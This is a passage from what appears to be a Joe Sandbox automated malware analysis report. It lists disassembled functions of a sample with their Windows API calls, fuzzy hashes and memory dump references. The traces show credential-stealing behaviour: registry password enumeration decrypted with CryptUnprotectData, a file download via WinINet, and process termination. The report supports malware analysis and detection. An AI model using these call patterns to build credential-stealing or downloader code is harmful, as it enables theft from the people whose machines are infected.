                                Yara matches
                                Similarity
                                • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                • String ID:
                                • API String ID: 1264946473-0
                                • Opcode ID: 433e9a4bf85689ea499530dbd9bc9d0136ce5d86df687ba0ccf0b09cf5ce9ff0
                                • Instruction ID: 87af2654e19513004238557e6de02c5a5e650228402e0954dbb78c8a01a3eddc
                                • Opcode Fuzzy Hash: 433e9a4bf85689ea499530dbd9bc9d0136ce5d86df687ba0ccf0b09cf5ce9ff0
                                • Instruction Fuzzy Hash: 03513A75A10609AFDB11EFA4DC89EEEB7B9EF58300F104419FA05E7250DB34AE05DBA0
                                Function 003ADFA0 Relevance: 16.7, APIs: 11, Instructions: 175stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcat.KERNEL32(?,00F7F3E8), ref: 003AE00D
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003AE037
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AE06F
                                • lstrcat.KERNEL32(?,00000000), ref: 003AE07D
                                • lstrcat.KERNEL32(?,?), ref: 003AE098
                                • lstrcat.KERNEL32(?,?), ref: 003AE0AC
                                • lstrcat.KERNEL32(?,00F6A748), ref: 003AE0C0
                                • lstrcat.KERNEL32(?,?), ref: 003AE0D4
                                • lstrcat.KERNEL32(?,00F7E678), ref: 003AE0E7
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AE11F
                                • GetFileAttributesA.KERNEL32(00000000), ref: 003AE126
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 4230089145-0
                                • Opcode ID: 1f09fa19649bf261f3981e7b4f4494db58eed64805e8e90fb7437d35e4a9732a
                                • Instruction ID: 5fc75f30da0b2f9bc502be2674a2256875f3bb9c999f32d62e70cd4e951f9bdc
                                • Opcode Fuzzy Hash: 1f09fa19649bf261f3981e7b4f4494db58eed64805e8e90fb7437d35e4a9732a
                                • Instruction Fuzzy Hash: 8D618E7191151CAFCB56DB64CC48ADEB7B8FF58300F1049A5A60AA7250DF70AF899F90
                                Function 00396AD0 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00396AFF
                                • InternetOpenA.WININET(003BCFEC,00000001,00000000,00000000,00000000), ref: 00396B2C
                                • StrCmpCA.SHLWAPI(?,00F7FC90), ref: 00396B4A
                                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00396B6A
                                • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00396B88
                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00396BA1
                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00396BC6
                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00396BF0
                                • CloseHandle.KERNEL32(00000000), ref: 00396C10
                                • InternetCloseHandle.WININET(00000000), ref: 00396C17
                                • InternetCloseHandle.WININET(?), ref: 00396C21
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                • String ID:
                                • API String ID: 2500263513-0
                                • Opcode ID: 78fc8693c8d8047dd9292f1cd669b5fc4f44298fdfeaef704592429b9ab75837
                                • Instruction ID: fbfebca6a7e022a2d15a14d88e0a100cdfe6c937fd8e512e0cf152da6542e642
                                • Opcode Fuzzy Hash: 78fc8693c8d8047dd9292f1cd669b5fc4f44298fdfeaef704592429b9ab75837
                                • Instruction Fuzzy Hash: 37419271A01605AFDF21DF65DC4AFAE77B8EB54701F004458FA05EB280EF70AD449BA4
                                Function 003B4500 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 95memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,003A4F39), ref: 003B4545
                                • RtlAllocateHeap.NTDLL(00000000), ref: 003B454C
                                • wsprintfW.USER32 ref: 003B455B
                                • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 003B45CA
                                • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 003B45D9
                                • CloseHandle.KERNEL32(00000000,?,?), ref: 003B45E0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                                • String ID: 9O:$%hs$9O:
                                • API String ID: 885711575-419449927
                                • Opcode ID: f57a9c471fe825cd0781ec045f47e76b5fbc46767caf49317351ef90675cae04
                                • Instruction ID: 9fd1f31ca9e313a80409a7cddbf2fe3886522889ad2b258ca7b3d7b2da920622
                                • Opcode Fuzzy Hash: f57a9c471fe825cd0781ec045f47e76b5fbc46767caf49317351ef90675cae04
                                • Instruction Fuzzy Hash: 05317072A00A09BFDB21DBA4DC49FEE7778FF55704F104059F605E7180DB70AA458BA9
                                Function 0039BBF9 Relevance: 15.2, APIs: 12, Instructions: 249stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039BC1F
                                • lstrlen.KERNEL32(00000000), ref: 0039BC52
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039BC7C
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0039BC84
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039BCAC
                                • lstrlen.KERNEL32(003C4AD4), ref: 0039BD23
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID:
                                • API String ID: 2500673778-0
                                • Opcode ID: 1275a340217cac04d5bde0b5c71894fb8d51b5ff6ca89bfb3b1a4630084792e4
                                • Instruction ID: 1932afd748f7e9713152dc5d5809b743c7b7d21e9ed7de9fafa65592a3b8ef6a
                                • Opcode Fuzzy Hash: 1275a340217cac04d5bde0b5c71894fb8d51b5ff6ca89bfb3b1a4630084792e4
                                • Instruction Fuzzy Hash: 92A17F31A01605DFCF26EF69EA49EAEB7B4BF54304F1A8069E406DB261DB31DC45CB90
                                Function 003B5EE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 215COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 003B5F2A
                                • std::_Xinvalid_argument.LIBCPMT ref: 003B5F49
                                • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 003B6014
                                • memmove.MSVCRT(00000000,00000000,?), ref: 003B609F
                                • std::_Xinvalid_argument.LIBCPMT ref: 003B60D0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_$memmove
                                • String ID: invalid string position$string too long
                                • API String ID: 1975243496-4289949731
                                • Opcode ID: c789b21c9d30722817a87c8a91c148d57992324cc2cd9135fdbdb54e28bcf499
                                • Instruction ID: 9167fea908933a59310a692e595758374343b535f394e648a2ab166d2092c174
                                • Opcode Fuzzy Hash: c789b21c9d30722817a87c8a91c148d57992324cc2cd9135fdbdb54e28bcf499
                                • Instruction Fuzzy Hash: 7F61A370714504DBDB1ADF5DC8D1AAEF3B6EF84308B244919E692CBB82D731ED808B55
                                Function 003AE049 Relevance: 13.6, APIs: 9, Instructions: 124stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AE06F
                                • lstrcat.KERNEL32(?,00000000), ref: 003AE07D
                                • lstrcat.KERNEL32(?,?), ref: 003AE098
                                • lstrcat.KERNEL32(?,?), ref: 003AE0AC
                                • lstrcat.KERNEL32(?,00F6A748), ref: 003AE0C0
                                • lstrcat.KERNEL32(?,?), ref: 003AE0D4
                                • lstrcat.KERNEL32(?,00F7E678), ref: 003AE0E7
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AE11F
                                • GetFileAttributesA.KERNEL32(00000000), ref: 003AE126
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$AttributesFile
                                • String ID:
                                • API String ID: 3428472996-0
                                • Opcode ID: d6e3be09b042d7baeea0edceb2faf26145ad815c3586776b3d01e25f86f10bc1
                                • Instruction ID: 5f2482f59ba2a162656e24895b4c6fc66f75c7f89094722d92070141b1185fe1
                                • Opcode Fuzzy Hash: d6e3be09b042d7baeea0edceb2faf26145ad815c3586776b3d01e25f86f10bc1
                                • Instruction Fuzzy Hash: C6416B72911528AFCF26EB64DC49ADE73B4BF58300F0149A4B90AA7251DF309F899F90
                                Function 00397A60 Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 109stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 003977D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00397805
                                  • Part of subcall function 003977D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0039784A
                                  • Part of subcall function 003977D0: StrStrA.SHLWAPI(?,Password), ref: 003978B8
                                  • Part of subcall function 003977D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 003978EC
                                  • Part of subcall function 003977D0: HeapFree.KERNEL32(00000000), ref: 003978F3
                                • lstrcat.KERNEL32(00000000,003C4AD4), ref: 00397A90
                                • lstrcat.KERNEL32(00000000,?), ref: 00397ABD
                                • lstrcat.KERNEL32(00000000, : ), ref: 00397ACF
                                • lstrcat.KERNEL32(00000000,?), ref: 00397AF0
                                • wsprintfA.USER32 ref: 00397B10
                                • lstrcpy.KERNEL32(00000000,?), ref: 00397B39
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00397B47
                                • lstrcat.KERNEL32(00000000,003C4AD4), ref: 00397B60
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                                • String ID: :
                                • API String ID: 398153587-3653984579
                                • Opcode ID: b4299a96f933bd65b2f0305ca4b74d6e48781b09c6b1a5f2840d1d4ecec8d789
                                • Instruction ID: b06bf037cbf78dce8d0762df2f6c2abd45a86b5dd42f741faa44340ebcb7b67a
                                • Opcode Fuzzy Hash: b4299a96f933bd65b2f0305ca4b74d6e48781b09c6b1a5f2840d1d4ecec8d789
                                • Instruction Fuzzy Hash: 8531C376A24618EFCF12DBA8DC48EAFB779FB94300B150519E506A3340DB70ED49DBA0
                                Function 003A81B0 Relevance: 12.7, APIs: 10, Instructions: 175stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 003A820C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A8243
                                • lstrlen.KERNEL32(00000000), ref: 003A8260
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A8297
                                • lstrlen.KERNEL32(00000000), ref: 003A82B4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A82EB
                                • lstrlen.KERNEL32(00000000), ref: 003A8308
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A8337
                                • lstrlen.KERNEL32(00000000), ref: 003A8351
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A8380
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: f0216665feaa68fb5bdc623bfb228ab6b21b71497b33d2e20bf4a6415ea97f89
                                • Instruction ID: cb948683ed0744c66fa5ce79fc239dc5c2b1f8fb1fb1f7951aaddc41e49a84b7
                                • Opcode Fuzzy Hash: f0216665feaa68fb5bdc623bfb228ab6b21b71497b33d2e20bf4a6415ea97f89
                                • Instruction Fuzzy Hash: F9518F79901A02AFDF16DF69D868A6BB7A8FF05700F164514AD06DB284EF30ED61CBD0
                                Function 003977D0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 208registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00397805
                                • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0039784A
                                • StrStrA.SHLWAPI(?,Password), ref: 003978B8
                                  • Part of subcall function 00397750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0039775E
                                  • Part of subcall function 00397750: RtlAllocateHeap.NTDLL(00000000), ref: 00397765
                                  • Part of subcall function 00397750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0039778D
                                  • Part of subcall function 00397750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 003977AD
                                  • Part of subcall function 00397750: LocalFree.KERNEL32(?), ref: 003977B7
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003978EC
                                • HeapFree.KERNEL32(00000000), ref: 003978F3
                                • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00397A35
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
